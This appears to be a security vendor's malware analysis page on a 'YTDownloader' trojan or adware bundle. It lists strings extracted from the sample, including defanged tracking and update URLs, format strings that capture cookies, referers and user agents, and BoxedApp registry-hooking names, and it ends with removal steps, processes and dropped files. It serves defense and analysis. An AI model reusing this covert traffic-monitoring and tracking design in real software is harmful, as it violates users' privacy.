SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

(build %d)

Windows 2000

Windows XP

Web Edition

Windows Server 2003,

Windows XP Professional x64 Edition

Windows Home Server

Windows Storage Server 2003

Windows Server 2003 R2,

Web Server Edition

Windows Server 2008 R2

Windows 8

Windows 7

Windows Server 2008

Windows Vista

{X-hX-hX-XX-XXXXXX}

sbmntr.sys

Converter.exe

DownloadHelper.exe

HELPEREXELOCATION

YTDownloader.exe

MONITOREXELOCATION

hXXp://VVV.ytdownloader.com/feedback/

Driver - %ws: %x

\\.\SBMonitor

net.exe

Driver installed, NOT loaded: %s

Driver installed, loaded from %s

Software\Opera Software\

%programFiles%\Opera\opera.exe

Apple Application Support\WebKit2WebProcess.exe

Safari.exe

%programFiles%\Safari\Safari.exe

%programFiles%\Mozilla Firefox\firefox.exe

IEXPLORE.EXE

%programFiles%\Internet Explorer\iexplore.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%LOCALAPPDATA%\Google\Chrome\Application\chrome.exe

converter.exe

webm

[CMonitor::AddAppIdToDriver]___Error: Could not add App Ids (%x).

Same as one of buttons PID %d

Same as our PID %d

[CMonitor::EnableMonitoring]___Error: Could not enable monitoring device (%x).

___Error: Could not open device (%u).

-pid %d -size %s -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -useragent %s -resolution %s -protocol http

CMonitor::BuildParams Already created similar url, %ws

CMonitor::BuildParams Button exists for similar url, %ws

youtube.com

-pid %d -size %I64d -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -ads %s -useragent %s -protocol http

-pid %d -rawdata %s -protocol rtmp -duration %s -resolution %s

Fwpuclnt.dll

https

Not application/octet-stream video and the size is bigger than %d, %d

Not application/octet-stream video and the size is smaller than %d

Not FLV video and the size is smaller than %d

vid2.ak.dmcdn.net

CHttpMonitor::SameYoutubeVideo Same params page id = %s, itag = %s

CHttpMonitor::SameYoutubeVideo DASH same params page id = %s, itag = %s

CHttpMonitor::SameYoutubeVideo Same watch page %s

HTTP_Version_String

[HttpParser::ParseLine] ___Error: The field separator was not found in the line:

VVV.google.com

Global\{9DA0BEED-7248-450a-B27C-C0409BDC377D}

YTD-icon-128x128.png

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

%saction=%s&userid=%s&usid=%s&aff=%s&v=%s&url=%s&title=%s&pingtext=%s&protocol=%s&size=%I64d&ref=%s&browser=%s

hXXp://rep.ytdownloader.com/app/ping.ashx?

%s%s%s

[RtmpDownloader::CreateProcessStdoutPipe] ___Error SetHandleInformation: %d

[RtmpDownloader::CreateProcessStdoutPipe] ___Error CreatePipe: %d

[RtmpDownloader::CreateProcessStdoutPipe] ___Error StdOut CloseHandle: %d

rtmpdump.exe

[RtmpDownloader::ReadFromPipe] --- Download Ends ---

[RtmpDownloader::ReadFromPipe] --- Download Begins ---

[RtmpDownloader::RunCommandLine] ___Error CreateProcess: %s. LE: %d

Error : failed to run FFmpeg - %d

[RtmpDownloader::RunCommandLine] ___Error CreateProcessStdoutPipe

Failed to run update (%x).

Trying to execute an update.

CUpdater::parseUpdateXML Set report level to %ws

REPORT

CMDLINE

%sid=%d_r=%lld_err=%d

%suserid=%s&aff=%s&v=%s

hXXp://VVV.ytdownloader.com/app/update.ashx?

mscoree.dll

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

ADVAPI32.DLL

WUSER32.DLL

<>"#%{}|\^~[]`' ?&

%Program Files%\YTDownloader\YTDownloader.exe

1.0.3.9

YTDownloader.exe_2380_rwx_10000000_000E6000:

.text

`.rdata

@.data

.rsrc

@.reloc

</.uCU

FtPh8

u$D

<p.uH

FTPSW

The embedding BoxedApp into child processes: %s

GetCommandLineA preparing to intercept...done

GetCommandLineW preparing to intercept...done

The command line overriding: %s

Get old args...done

Get current dir...done

Get the extension...done

Get exe dir...done

Get exe dir...

550e832f-a497-4eb7-bb40-8cc856f6d152

BoxedAppSDK::FileSystem::CFileSystem::DoFileOperation_FullPath

, passed pBehavior returns FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create not a directory

, passed pBehavior doesn't support IVirtualFile

, passed pBehavior doesn't return FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create a directory

It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream

[Isolation] DoFileOperation_FullPath: CreateFileDeletedInformationFile

BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys

NtEnumerateKey() returned unexpected error, status =

, RegTree::IEnumKeyNode::GetNext() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys

, RegTree::IKeyNode::EnumKeys() failed, hr =

: IVirtualKeyHandle::CreateKey() failed, hr =

: RegTree::IEnumKeyNode::GetNext() failed, hr =

: GetAllChildsKeys() failed, status =

BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal

: RegTree::IKeyNode::EnumKeys() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath

error, IVirtualKeyHandle_GetFullPath() returned

Invalid key information class:

KeySetHandleTagsInformation is not supported for virtual handle

KeySetDebugInformation is not supported for virtual handle

KeySetVirtualizationInformation is not supported for virtual handle

KeyControlFlagsInformation is not supported for virtual handle

KeyWow64FlagsInformation is not supported for virtual handle

We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles

We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles

: IVirtualKeyHandle::Rename() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal

: RegTree::IKeyNode::Rename() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::SearchNodePointsToRealKey

: CRegistry::SetIsolationMode() failed for the hKey =

BoxedAppSDK::Registry::Impl::CRegistry::CreateNodePointsToRealKey

: result hkey =

: IVirtualKey::CreateKey() failed, hr =

: we can't create a virtual key with its own behavior under another virtual key

: Handles::CreateVirtualKeyHandle() failed, hr =

: IVirtualKey::OpenKey() failed, hr =

: GetFullRegKeyPath() failed for the hKey =

: Handles::IVirtualKeyHandle::CreateKey() failed and returned

: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key

BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKeyHelper

: lpSubKey: "

BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey

BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKeyEx

BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal

: SearchStartingFromRealKey() failed

: RegTree::IKeyNode::FindValue() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal

: IVirtualKeyHandle::put_Value() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime

: NtQueryKey() failed, status =

: NtOpenKey() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys

: NtEnumerateValueKey() failed when we tried to get name of the node, status =

: IKeyNode::EnumValues() failed, hr =

: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =

: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal

BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal

: invalid KeyInformationClass passed:

: IVirtualKeyHandle_GetFullPath() failed, hr =

: Behavior::IEnumVirtualKey::GetNext() failed, hr =

: IVirtualKeyHandle::EnumValues() failed, hr =

: IVirtualKeyHandle::EnumKeys() failed, hr =

: IVirtualKeyHandle::get_LastWriteTime() failed, hr =

reg:NtQueryMultipleValueKey(

: IKeyNode::FindValue() failed, hr =

: IVirtualKeyHandle::get_Value() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal

: IVirtualKeyHandle::get_ValueType() failed, hr =

reg:NtSetInformationKey(

RegTree::IKeyNode::RemoveValue() failed, hr

BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal

reg:NtRenameKey(

reg:NtCreateKey(

BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyProcessView

RegTree::IEnumKeyNode::GetNext(), hr =

reg:NtDeleteValueKey(

: NtEnumerateKey() failed when we tried to get name of the node, status =

, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =

, Behavior::IVirtualKey::OpenKey() failed, hr =

: IKeyNode::EnumKeys() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal

reg:NtEnumerateValueKey(

reg:NtOpenKey(

reg:NtQueryKey(

reg:NtQueryValueKey(

reg:NtSetValueKey(

BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal

reg:NtEnumerateKey(

reg:NtDeleteKey(

TryCreateProcessForVirtualEXE, template exe found:

CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x

CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x

CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x

CBoxedAppCore::My_NtQueryKey, KeyHandle =

CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =

CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x

KernelBase.dll

kernel32.dll

0x%x%x

CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '

CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '

CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '

CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '

CBoxedAppCore::My_NtRenameKey, KeyHandle =

BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart

: Can't create process of rundll32.exe, last error =

VirtualDllWithSameImport.dll

BoxedAppSDK_RemoveExeFromAttachableChildProcListW

BoxedAppSDK_RemoveExeFromAttachableChildProcListA

BoxedAppSDK_AddExeToAttachableChildProcListW

BoxedAppSDK_AddExeToAttachableChildProcListA

BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListA

BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListW

BoxedAppSDK_AddExeToAttachableChildProcExclusionListA

BoxedAppSDK_AddExeToAttachableChildProcExclusionListW

BoxedAppSDK_GetRegKeyIsolationModeA

BoxedAppSDK_GetRegKeyIsolationModeW

BoxedAppSDK_SetRegKeyIsolationModeA

BoxedAppSDK_SetRegKeyIsolationModeW

BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper

BoxedAppSDK_AttachMixedBitnessProcessHelper

BoxedAppSDK_EnumVirtualRegKeysA

BoxedAppSDK_EnumVirtualRegKeysW

BoxedAppSDK_ExecuteDotNetApplicationA

BoxedAppSDK_ExecuteDotNetApplicationW

BoxedAppSDK_DeleteVirtualRegKeyByHandle

BoxedAppSDK_DeleteVirtualRegKeyW

BoxedAppSDK_DeleteVirtualRegKeyA

BoxedAppSDK_AddVirtualRegKeyW

BoxedAppSDK_AddVirtualRegKeyA

BoxedAppSDK_CreateVirtualRegKeyW

BoxedAppSDK_CreateVirtualRegKeyA

{4F95F74C-9713-4181-ACDD-8A50195FBC0F}

BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper

BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper

CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '

CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x

CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x

:\VirtualDllWithSameImport.dll

:\VirtualDllWithTls.dll

VirtualDllWithTls.dll

_CorExeMain

ole32.dll

WinExec

advapi32.dll

NtRenameKey

NtUnloadKey

NtSetValueKey

NtSetInformationKey

NtSaveKey

NtRestoreKey

NtReplaceKey

NtQueryValueKey

NtQueryMultipleValueKey

NtQueryKey

NtOpenKeyEx

NtOpenKey

NtNotifyChangeKey

NtLoadKey2

NtLoadKey

NtFlushKey

NtEnumerateValueKey

NtEnumerateKey

NtDeleteValueKey

NtDeleteKey

NtCreateKey

ntdll.dll

[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]

FILE_EXECUTE

GENERIC_EXECUTE

KEY_WOW64_64KEY

KEY_WOW64_32KEY

KEY_NOTIFY

KEY_CREATE_LINK

KEY_ENUMERATE_SUB_KEYS

KEY_CREATE_SUB_KEY

KEY_SET_VALUE

KEY_QUERY_VALUE

SECTION_MAP_EXECUTE

PAGE_EXECUTE_WRITECOPY

PAGE_EXECUTE_READWRITE

PAGE_EXECUTE_READ

PAGE_EXECUTE

STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED

STATUS_LOCAL_USER_SESSION_KEY

STATUS_NULL_LM_PASSWORD

STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE

STATUS_CARDBUS_NOT_SUPPORTED

STATUS_INVALID_PORT_ATTRIBUTES

STATUS_PORT_MESSAGE_TOO_LONG

STATUS_PORT_DISCONNECTED

STATUS_PORT_CONNECTION_REFUSED

STATUS_INVALID_PORT_HANDLE

STATUS_PORT_ALREADY_SET

STATUS_EAS_NOT_SUPPORTED

STATUS_CTL_FILE_NOT_SUPPORTED

STATUS_WRONG_PASSWORD

STATUS_ILL_FORMED_PASSWORD

STATUS_PASSWORD_RESTRICTION

STATUS_PASSWORD_EXPIRED

STATUS_FLOAT_DENORMAL_OPERAND

STATUS_FLOAT_INVALID_OPERATION

STATUS_PIPE_NOT_AVAILABLE

STATUS_INVALID_PIPE_STATE

STATUS_PIPE_BUSY

STATUS_PIPE_DISCONNECTED

STATUS_PIPE_CLOSING

STATUS_PIPE_CONNECTED

STATUS_PIPE_LISTENING

STATUS_NOT_SUPPORTED

STATUS_PIPE_EMPTY

STATUS_WRONG_PASSWORD_CORE

STATUS_PIPE_BROKEN

STATUS_DISK_OPERATION_FAILED

STATUS_KEY_DELETED

STATUS_KEY_HAS_CHILDREN

STATUS_NO_USER_SESSION_KEY

STATUS_PASSWORD_MUST_CHANGE

STATUS_PORT_UNREACHABLE

STATUS_LOGIN_TIME_RESTRICTION

STATUS_LOGIN_WKSTA_RESTRICTION

STATUS_UNSUPPORTED_COMPRESSION

STATUS_NO_USER_KEYS

STATUS_NOT_EXPORT_FORMAT

STATUS_TRANSPORT_FULL

STATUS_WMI_NOT_SUPPORTED

STATUS_SAM_NEED_BOOTKEY_PASSWORD

STATUS_SAM_NEED_BOOTKEY_FLOPPY

STATUS_STRONG_CRYPTO_NOT_SUPPORTED

STATUS_NOT_SUPPORTED_ON_SBS

STATUS_CSS_KEY_NOT_PRESENT

STATUS_CSS_KEY_NOT_ESTABLISHED

STATUS_NO_KERB_KEY

STATUS_UNSUPPORTED_PREAUTH

STATUS_PORT_NOT_SET

STATUS_INVALID_IMPORT_OF_NON_DLL

STATUS_SMARTCARD_NO_KEY_CONTAINER

STATUS_SMARTCARD_NO_CERTIFICATE

STATUS_SMARTCARD_NO_KEYSET

STATUS_SMARTCARD_CERT_REVOKED

STATUS_SMARTCARD_CERT_EXPIRED

STATUS_SXS_KEY_NOT_FOUND

STATUS_CLUSTER_JOIN_IN_PROGRESS

STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS

RegDeleteKeyExW

NtRequestWaitReplyPort

NtConnectPort

NtReplyPort

NtCompleteConnectPort

NtAcceptConnectPort

NtReplyWaitReceivePort

NtCreateWaitablePort

Imported function,

.data

.idata

GetWindowsDirectoryW

GetProcessHeap

KERNEL32.dll

USER32.dll

GDI32.dll

RegCloseKey

RegDeleteKeyW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyW

ADVAPI32.dll

OLEAUT32.dll

bxsdk32.dll

i:\build\boxedapp_src\src\boxedapp\bxsdk\bin\release_full\bxsdk32.pdb

`.rsrc

v2.0.50727

BoxedAppSDK_AppDomainManager.dll

System.Security

.ctor

System.Security.Policy

System.Reflection

System.Runtime.InteropServices

System.Diagnostics

System.Runtime.CompilerServices

System.IO

DllImportAttribute

shell32.dll

lpCmdLine

System.Collections

System.Security.Permissions

1.0.0.0

$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78

I:\build\boxedapp_src\src\BoxedApp\bxsdk\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb

mscoree.dll

BoxedAppSDKThunk.dll

i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\boxedappsdkthunk\BoxedAppSDKThunk.pdb

.reloc

TLSSupport.dll

i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\tlssupport\TLSSupport.pdb

5"6.676@6|6

3O4L4T4]4

3(4,40444

11U1|1

>%>*>0>5>

2(4,40444

5f6D6e6

0=0"1.171@1`1

9%9u9~9

3 3-343;3

5o6L6T6]6

< ='=2=8=

;%;,;2;8;=;

: :4:8:<:@:

? ?$?(?,?0?4?8?<?

: :$:(:,:0:

GdiPlus.dll

HKEY_USERS

HKEY_CURRENT_CONFIG

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

%s\%s

:\tempManifest.manifest

%s\winsxs\tempBxDir\virtualAsm

BoxedAppVar:OldCmdLine

BoxedAppVar:ExeFullPath

BoxedAppVar:ExeFileNameWithoutExtension

BoxedAppVar:ExeFileExtension

BoxedAppVar:ExeFileName

BoxedAppLog_%d.txt

%s_%.8x

#SystemDrive#\#Windows#

#SystemDrive#\#Windows#\#System32#

\Device\NETBT_TCPIP_

\DosDevices\pipe\

\Device\NamedPipe\

\??\pipe\

publicKeyToken

Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\

.manifest

%s_%.8x_%.8x

.boxedapp_msg_process

boxedapp_event_newmsg

boxedapp_msg_global

bxsdk64.dll

:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\

\KernelBase.dll

\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll

\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll

%d-%d-%p

:\TLSSupport310D39B571B74d36B95451DD240D8758

",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper

\rundll32.exe"

DotNetAppDomainManager.CManagedHost

BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1

DotNetAppDomainManager.CAppDomainManager

>.config

",BoxedAppSDK_AttachMixedBitnessProcessHelper

Attempt to launch not executable file:

Unable to find appropriate template exe

comdlg32.dll

\dllhost.exe

image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are 0, so this application is not a .net application; we are exiting now

nimage_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are not 0, so this application seems to be a .net application; we are executing mscoree.dll!_CorExeMain now

image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].Size =

image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] =

image_nt_headers.OptionalHeader.AddressOfEntryPoint is NULL, let's check if this application is .net

hh.exe

find.exe

help.exe

winver.exe

regsvr32.exe

dllhost.exe

ntvdm.exe

tcpsvcs.exe

mpr.dll

sxs.dll

Obtain a full version, purchase a license at hXXp://boxedapp.com/boxedappsdk/order.html

%s_%.8x_%.8x_%.8x

.config

3, 3, 5, 12

BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Softanics

BoxedAppSDK.dll

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

BrowserHelper.exe:3952
Owxbocg.exe:3476
ping.exe:3544
ping.exe:2200
ping.exe:2440
ping.exe:3428
ping.exe:3660
ping.exe:3380
ping.exe:2616
ping.exe:2936
ping.exe:2448
ping.exe:3936
ping.exe:2192
ping.exe:1768
ping.exe:476
ping.exe:2624
ping.exe:3984
ping.exe:2828
ping.exe:2944
ping.exe:2820
ns19.tmp:3928
ins_sense.exe:2400
find.exe:1336
f.exe:3008
Wiwyiyugmbkl.exe:3564
sc.exe:3620
sc.exe:1368
sc.exe:3300
net.exe:3464
net.exe:3828
net1.exe:1388
net1.exe:3552
setup.exe:2060
setup.exe:3052
tcpsvcs.exe:2296
ins_geforce.exe:2388
ShopperPro.exe:2116
c98dc9.exe:3000
ins_shopperpro.exe:1204
regsvr32.exe:2224
%original file name%.exe:608
%original file name%.exe:2164
%original file name%.exe:2156
%original file name%.exe:576
%original file name%.exe:228
BROWSE~2.EXE:3668
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\vdutpty.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\bprbcxj.dll (5 bytes)
%Program Files%\Sense\81f9e262-02a6-4ea6-97d4-4caa9d97c07c-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\pvmkp.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\ybviqo.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\63246 (39765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp (541196 bytes)
%WinDir%\Tasks\81f9e262-02a6-4ea6-97d4-4caa9d97c07c-5.job (72 bytes)
%Program Files%\Sense\utils.exe (66065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\205121 (9520 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\zbacizheh.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\hcrejpusx.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\xlcieu.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Owxbocg.exe (1217838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ybviqo.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Ltyvpos.tmp (332963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ikjtrx.dll (2028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\zbacizheh.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_c (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_b (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_a (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8593.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_e (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_d (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (595014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\System.dll (784 bytes)
%WinDir%\Tasks\fe56664a-ffec-4080-bee0-aa32cf23ac94-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\hdiyyhpn.dll (4 bytes)
%Program Files%\Ge-Force\fe56664a-ffec-4080-bee0-aa32cf23ac94-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\eetruve.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\348421 (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\ewcryykvh.dll (5 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\vokcloqal.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\fejdf.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\kidpn.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y41BH0NX\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\caaig.dll (14 bytes)
%Program Files%\Ge-Force\utils.exe (65077 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\406185 (39553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsExec.dll (6 bytes)
%Program Files%\ShopperPro\Updater.exe (25776 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\jsdrv.exe (100378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\AccDownload.dll (9320 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsProcess.dll (4 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (156512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\MoreInfo.dll (7 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (6 bytes)
%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44478 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (48500 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\ns19.tmp (6 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11035 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4236 bytes)
%Program Files%\YTDownloader\Updater.exe (17576 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10762 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\AccDownload.dll (9226 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Program Files%\Common Files\System\SysMenu.dll (15287 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20022 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsExec.dll (6 bytes)
%Program Files%\YTDownloader\converter.exe (61415 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\NK.lky (16 bytes)
